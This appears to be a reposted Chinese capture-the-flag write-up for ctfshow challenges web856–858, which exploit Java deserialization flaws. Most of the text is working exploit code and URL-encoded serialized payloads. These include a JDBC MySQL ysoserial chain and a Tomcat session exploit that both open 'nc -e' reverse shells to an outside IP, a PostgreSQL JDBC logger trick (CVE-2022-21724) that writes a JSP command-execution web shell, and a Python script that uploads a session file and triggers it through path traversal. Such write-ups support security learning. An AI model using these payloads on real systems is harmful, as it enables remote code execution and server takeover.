41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%49%77%41%41%41%64%54%4b%2f%72%71%2b%41%41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%41%51%42%34%64%58%49%41%45%6c%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%4e%73%59%58%4e%7a%4f%36%73%57%31%36%37%4c%7a%56%71%5a%41%67%41%41%65%48%41%41%41%41%41%42%64%6e%49%41%48%57%70%68%64%6d%46%34%4c%6e%68%74%62%43%35%30%63%6d%46%75%63%32%5a%76%63%6d%30%75%56%47%56%74%63%47%78%68%64%47%56%7a%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%4e%79%41%42%46%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%53%47%46%7a%61%45%31%68%63%41%55%48%32%73%48%44%46%6d%44%52%41%77%41%43%52%67%41%4b%62%47%39%68%5a%45%5a%68%59%33%52%76%63%6b%6b%41%43%58%52%6f%63%6d%56%7a%61%47%39%73%5a%48%68%77%50%30%41%41%41%41%41%41%41%41%42%33%43%41%41%41%41%42%41%41%41%41%41%41%65%48%68%32%63%67%41%53%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%32%5a%58%4a%79%61%57%52%6c%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%45%41%66%67%41%75

web856

考察JDBC反序列化,并给了User类和Connection类代码

Connection类源码如下:

  1. package com.ctfshow.entity;
  2. import java.io.IOException;
  3. import java.io.ObjectInputStream;
  4. import java.io.Serializable;
  5. import java.sql.DriverManager;
  6. import java.sql.SQLException;
  7. import java.util.Objects;
  8. public class Connection implements Serializable {
  9. private static final long serialVersionUID = 2807147458202078901L;
  10. private String driver;
  11. private String schema;
  12. private String host;
  13. private int port;
  14. private User user;
  15. private String database;
  16. public String getDriver() {
  17. return driver;
  18. }
  19. public void setDriver(String driver) {
  20. this.driver = driver;
  21. }
  22. public String getSchema() {
  23. return schema;
  24. }
  25. public void setSchema(String schema) {
  26. this.schema = schema;
  27. }
  28. public void setPort(int port) {
  29. this.port = port;
  30. }
  31. public String getHost() {
  32. return host;
  33. }
  34. public void setHost(String host) {
  35. this.host = host;
  36. }
  37. public User getUser() {
  38. return user;
  39. }
  40. public void setUser(User user) {
  41. this.user = user;
  42. }
  43. public String getDatabase() {
  44. return database;
  45. }
  46. public void setDatabase(String database) {
  47. this.database = database;
  48. }
  49. private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException, SQLException {
  50. Class.forName("com.mysql.jdbc.Driver");
  51. ObjectInputStream.GetField gf = in.readFields();
  52. String host = (String) gf.get("host", "127.0.0.1");
  53. int port = (int) gf.get("port",3306);
  54. User user = (User) gf.get("user",new User("root","root"));
  55. String database = (String) gf.get("database", "ctfshow");
  56. String schema = (String) gf.get("schema", "jdbc:mysql");
  57. DriverManager.getConnection( schema+"://"+host+":"+port+"/?"+database+"&user="+user.getUsername());
  58. }
  59. @Override
  60. public boolean equals(Object o) {
  61. if (this == o) return true;
  62. if (!(o instanceof Connection)) return false;
  63. Connection that = (Connection) o;
  64. return Objects.equals(host, that.host) && Objects.equals(port, that.port) && Objects.equals(user, that.user) && Objects.equals(database, that.database);
  65. }
  66. @Override
  67. public int hashCode() {
  68. return Objects.hash(host, port, user, database);
  69. }
  70. }

User类源码如下:

  1. package com.ctfshow.entity;
  2. import java.io.*;
  3. public class User implements Serializable {
  4. private static final long serialVersionUID = -7205095498817563965L;
  5. private String username;
  6. private String password;
  7. public User(String username, String password) {
  8. this.username = username;
  9. this.password = password;
  10. }
  11. public String getUsername() {
  12. return username;
  13. }
  14. public void setUsername(String username) {
  15. this.username = username;
  16. }
  17. public String getPassword() {
  18. return password;
  19. }
  20. public void setPassword(String password) {
  21. this.password = password;
  22. }
  23. @Override
  24. public boolean equals(Object o) {
  25. if (this == o) return true;
  26. if (!(o instanceof User)) return false;
  27. User user = (User) o;
  28. return this.hashCode() == user.hashCode();
  29. }
  30. @Override
  31. public int hashCode() {
  32. return username.hashCode()+password.hashCode();
  33. }
  34. }

构造exp:

  1. package com.ctfshow.entity;
  2. import java.io.ByteArrayOutputStream;
  3. import java.io.IOException;
  4. import java.io.ObjectOutput;
  5. import java.io.ObjectOutputStream;
  6. import java.lang.reflect.Field;
  7. import java.util.Base64;
  8. public class exp {
  9. public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
  10. Connection connection = new Connection();
  11. Class<? extends Connection> aClass = connection.getClass();
  12. Field host = aClass.getDeclaredField("host");
  13. host.setAccessible(true);
  14. host.set(connection,"124.222.136.33");
  15. Field port = aClass.getDeclaredField("port");
  16. port.setAccessible(true);
  17. port.set(connection,3306);
  18. Field user = aClass.getDeclaredField("user");
  19. user.setAccessible(true);
  20. user.set(connection,new User("yso_CommonsCollections4_nc 124.222.136.33 1337 -e sh","123456"));
  21. Field schema = aClass.getDeclaredField("schema");
  22. schema.setAccessible(true);
  23. schema.set(connection,"jdbc:mysql");
  24. Field database = aClass.getDeclaredField("database");
  25. database.setAccessible(true);
  26. database.set(connection,"detectCustomCollations=true&autoDeserialize=true");
  27. serialize(connection);
  28. }
  29. public static void serialize(Object obj) throws IOException, IOException {
  30. ByteArrayOutputStream data =new ByteArrayOutputStream();
  31. ObjectOutput oos =new ObjectOutputStream(data);
  32. oos.writeObject(obj);
  33. oos.flush();
  34. oos.close();
  35. System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
  36. };
  37. }

最终payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%42%31%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%51%32%39%75%62%6d%56%6a%64%47%6c%76%62%69%62%30%2f%62%32%47%52%6f%36%31%41%67%41%47%53%51%41%45%63%47%39%79%64%45%77%41%43%47%52%68%64%47%46%69%59%58%4e%6c%64%41%41%53%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%54%64%48%4a%70%62%6d%63%37%54%41%41%47%5a%48%4a%70%64%6d%56%79%63%51%42%2b%41%41%46%4d%41%41%52%6f%62%33%4e%30%63%51%42%2b%41%41%46%4d%41%41%5a%7a%59%32%68%6c%62%57%46%78%41%48%34%41%41%55%77%41%42%48%56%7a%5a%58%4a%30%41%42%6c%4d%59%32%39%74%4c%32%4e%30%5a%6e%4e%6f%62%33%63%76%5a%57%35%30%61%58%52%35%4c%31%56%7a%5a%58%49%37%65%48%41%41%41%41%7a%71%64%41%41%77%5a%47%56%30%5a%57%4e%30%51%33%56%7a%64%47%39%74%51%32%39%73%62%47%46%30%61%57%39%75%63%7a%31%30%63%6e%56%6c%4a%6d%46%31%64%47%39%45%5a%58%4e%6c%63%6d%6c%68%62%47%6c%36%5a%54%31%30%63%6e%56%6c%63%48%51%41%44%6a%45%79%4e%43%34%79%4d%6a%49%75%4d%54%4d%32%4c%6a%4d%7a%64%41%41%4b%61%6d%52%69%59%7a%70%74%65%58%4e%78%62%48%4e%79%41%42%64%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%56%58%4e%6c%63%70%77%43%57%39%46%73%4e%70%4c%44%41%67%41%43%54%41%41%49%63%47%46%7a%63%33%64%76%63%6d%52%78%41%48%34%41%41%55%77%41%43%48%56%7a%5a%58%4a%75%59%57%31%6c%63%51%42%2b%41%41%46%34%63%48%51%41%42%6a%45%79%4d%7a%51%31%4e%6e%51%41%4e%48%6c%7a%62%31%39%44%62%32%31%74%62%32%35%7a%51%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%30%58%32%35%6a%49%44%45%79%4e%43%34%79%4d%6a%49%75%4d%54%4d%32%4c%6a%4d%7a%49%44%45%7a%4d%7a%63%67%4c%57%55%67%63%32%67%3d

成功反弹shell

web857

依然是JDBC反序列化,但数据库换成了pgsql

奇安信攻防社区-PostgreSQL JDBC Driver RCE(CVE-2022-21724)与任意文件写入漏洞利用与分析

因为Connection类设置了默认的ip和端口,不符合文章里直接RCE的特征,所以考虑任意文件写入

 

 exp:

  1. package com.ctfshow.entity;
  2. import java.io.ByteArrayOutputStream;
  3. import java.io.IOException;
  4. import java.io.ObjectOutput;
  5. import java.io.ObjectOutputStream;
  6. import java.lang.reflect.Field;
  7. import java.util.Base64;
  8. public class exp {
  9. public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
  10. Connection connection = new Connection();
  11. Class<? extends Connection> aClass = connection.getClass();
  12. Field driver = aClass.getDeclaredField("driver");
  13. driver.setAccessible(true);
  14. driver.set(connection,"org.postgresql.Driver");
  15. Field host = aClass.getDeclaredField("host");
  16. host.setAccessible(true);
  17. host.set(connection,"124.222.136.33");
  18. Field port = aClass.getDeclaredField("port");
  19. port.setAccessible(true);
  20. port.set(connection,3306);
  21. Field user = aClass.getDeclaredField("user");
  22. user.setAccessible(true);
  23. user.set(connection,new User("Jdk7u21","123456"));
  24. Field schema = aClass.getDeclaredField("schema");
  25. schema.setAccessible(true);
  26. schema.set(connection,"jdbc:postgresql");
  27. Field database = aClass.getDeclaredField("database");
  28. database.setAccessible(true);
  29. database.set(connection,"password=123456&loggerLevel=debug&loggerFile=../webapps/ROOT/yjh.jsp&<%Runtime.getRuntime().exec(request.getParameter(\"i\"));%>");
  30. serialize(connection);
  31. }
  32. public static void serialize(Object obj) throws IOException, IOException {
  33. ByteArrayOutputStream data =new ByteArrayOutputStream();
  34. ObjectOutput oos =new ObjectOutputStream(data);
  35. oos.writeObject(obj);
  36. oos.flush();
  37. oos.close();
  38. System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
  39. };
  40. }

关于目录

Tomcat 的 web 目录结构通常如下所示:

  1. webapps 目录

    • ROOT:默认的 Web 应用程序根目录,对应 URL 中的 /
    • 其他应用程序目录:每个独立的 Web 应用程序一般会被放置在单独的目录中,例如 myappanotherapp 等。
  2. Web 应用程序目录结构

    • WEB-INF 目录
      • web.xml:Web 应用程序的部署描述文件,配置 Servlet、Filter、Listener 等。
      • classes 目录:存放编译后的 Java 类文件(.class 文件)和资源文件。
      • lib 目录:存放 Web 应用程序依赖的第三方库(JAR 文件)。
    • 静态资源目录:存放 HTML、CSS、JavaScript、图片等静态资源文件。
    • JSP 文件目录:存放 JSP 文件。
  3. 示例目录结构(以 myapp 为例):

  1. /webapps
  2. ├── myapp
  3. │ ├── WEB-INF
  4. │ │ ├── web.xml
  5. │ │ ├── classes
  6. │ │ │ └── com
  7. │ │ │ └── example
  8. │ │ │ └── MyClass.class
  9. │ │ ├── lib
  10. │ │ │ └── library.jar
  11. │ ├── index.html
  12. │ ├── styles.css
  13. │ ├── script.js
  14. │ ├── page.jsp

payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%42%31%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%51%32%39%75%62%6d%56%6a%64%47%6c%76%62%69%62%30%2f%62%32%47%52%6f%36%31%41%67%41%47%53%51%41%45%63%47%39%79%64%45%77%41%43%47%52%68%64%47%46%69%59%58%4e%6c%64%41%41%53%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%54%64%48%4a%70%62%6d%63%37%54%41%41%47%5a%48%4a%70%64%6d%56%79%63%51%42%2b%41%41%46%4d%41%41%52%6f%62%33%4e%30%63%51%42%2b%41%41%46%4d%41%41%5a%7a%59%32%68%6c%62%57%46%78%41%48%34%41%41%55%77%41%42%48%56%7a%5a%58%4a%30%41%42%6c%4d%59%32%39%74%4c%32%4e%30%5a%6e%4e%6f%62%33%63%76%5a%57%35%30%61%58%52%35%4c%31%56%7a%5a%58%49%37%65%48%41%41%41%41%7a%71%64%41%42%2b%63%47%46%7a%63%33%64%76%63%6d%51%39%4d%54%49%7a%4e%44%55%32%4a%6d%78%76%5a%32%64%6c%63%6b%78%6c%64%6d%56%73%50%57%52%6c%59%6e%56%6e%4a%6d%78%76%5a%32%64%6c%63%6b%5a%70%62%47%55%39%4c%69%34%76%64%32%56%69%59%58%42%77%63%79%39%53%54%30%39%55%4c%33%6c%71%61%43%35%71%63%33%41%6d%50%43%56%53%64%57%35%30%61%57%31%6c%4c%6d%64%6c%64%46%4a%31%62%6e%52%70%62%57%55%6f%4b%53%35%6c%65%47%56%6a%4b%48%4a%6c%63%58%56%6c%63%33%51%75%5a%32%56%30%55%47%46%79%59%57%31%6c%64%47%56%79%4b%43%4a%70%49%69%6b%70%4f%79%55%2b%64%41%41%56%62%33%4a%6e%4c%6e%42%76%63%33%52%6e%63%6d%56%7a%63%57%77%75%52%48%4a%70%64%6d%56%79%64%41%41%4f%4d%54%49%30%4c%6a%49%79%4d%69%34%78%4d%7a%59%75%4d%7a%4e%30%41%41%39%71%5a%47%4a%6a%4f%6e%42%76%63%33%52%6e%63%6d%56%7a%63%57%78%7a%63%67%41%58%59%32%39%74%4c%6d%4e%30%5a%6e%4e%6f%62%33%63%75%5a%57%35%30%61%58%52%35%4c%6c%56%7a%5a%58%4b%63%41%6c%76%52%62%44%61%53%77%77%49%41%41%6b%77%41%43%48%42%68%63%33%4e%33%62%33%4a%6b%63%51%42%2b%41%41%46%4d%41%41%68%31%63%32%56%79%62%6d%46%74%5a%58%45%41%66%67%41%42%65%48%42%30%41%41%59%78%4d%6a%4d%30%4e%54%5a%30%41%41%64%4b%5a%47%73%33%64%54%49%78

先成功写马 

再访问/yjh.php,用nc反弹shell

成功反弹

web858

考察tomcat的session反序列化

Tomcat Session(CVE-2020-9484)反序列化 - 简书

 先随便上传一个文件看看上传路径

抓包看到调用的接口

看下User类

  1. package com.ctfshow.entity;
  2. import java.io.IOException;
  3. import java.io.ObjectInputStream;
  4. import java.io.Serializable;
  5. public class User implements Serializable {
  6. private static final long serialVersionUID = -3254536114659397781L;
  7. private String username;
  8. private String password;
  9. public String getUsername() {
  10. return username;
  11. }
  12. public void setUsername(String username) {
  13. this.username = username;
  14. }
  15. public String getPassword() {
  16. return password;
  17. }
  18. public void setPassword(String password) {
  19. this.password = password;
  20. }
  21. private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
  22. in.defaultReadObject();
  23. Runtime.getRuntime().exec(this.username);
  24. }
  25. }

exp:

  1. package com.ctfshow.entity;
  2. import java.io.*;
  3. import java.lang.reflect.Field;
  4. public class exp {
  5. public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, InstantiationException, IOException, ClassNotFoundException {
  6. Class userClass = User.class;
  7. //创建User实例
  8. User user = (User)userClass.newInstance();
  9. //获取username属性
  10. Field usernameField = userClass.getDeclaredField("username");
  11. //给属性加权限
  12. usernameField.setAccessible(true);
  13. //设置username属性
  14. usernameField.set(user,"nc 124.222.136.33 1337 -e /bin/sh");
  15. //获取文件输出流
  16. FileOutputStream fos = new FileOutputStream("exp.session");
  17. //获取对象输出流
  18. ObjectOutputStream oos = new ObjectOutputStream(fos);
  19. //序列化
  20. oos.writeObject(user);
  21. }
  22. }
  1. import requests
  2. url = "http://dfdbd0a0-732e-4512-9113-29d786ce39fb.challenge.ctf.show"
  3. files = {'file': ('exp.session', open('exp.session','rb').read(), 'image/png')}
  4. r = requests.post(url+"/file/upload", files=files)
  5. r2 = requests.get(url, cookies={
  6. 'JSESSIONID': '../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/upload/exp'})

监听端口,成功反弹shell

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/132800?site
推荐阅读
相关标签
  

闽ICP备14008679号